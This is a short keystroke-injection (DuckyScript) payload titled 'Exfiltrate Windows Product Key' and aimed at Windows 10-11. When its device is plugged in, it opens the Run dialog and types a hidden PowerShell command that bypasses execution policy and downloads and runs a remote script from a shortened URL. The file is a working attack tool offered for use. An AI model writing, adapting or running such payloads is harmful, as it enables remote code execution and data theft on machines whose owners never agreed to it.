REM ###################################################
REM #                                                 #
REM # Description template: Aleff (Link down)         #
REM # https://github.com/aleff-github/                #
REM # Title        : Exfiltrate Windows Product Key   #
REM # Author       : NazarHK                          #
REM # Version      : 1.0                              #
REM # Target       : Windows 10-11                    #
REM #                                                 #
REM ###################################################

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -ep bypass -Command "irm https://bit.ly/49SFZ7f | iex"
ENTER
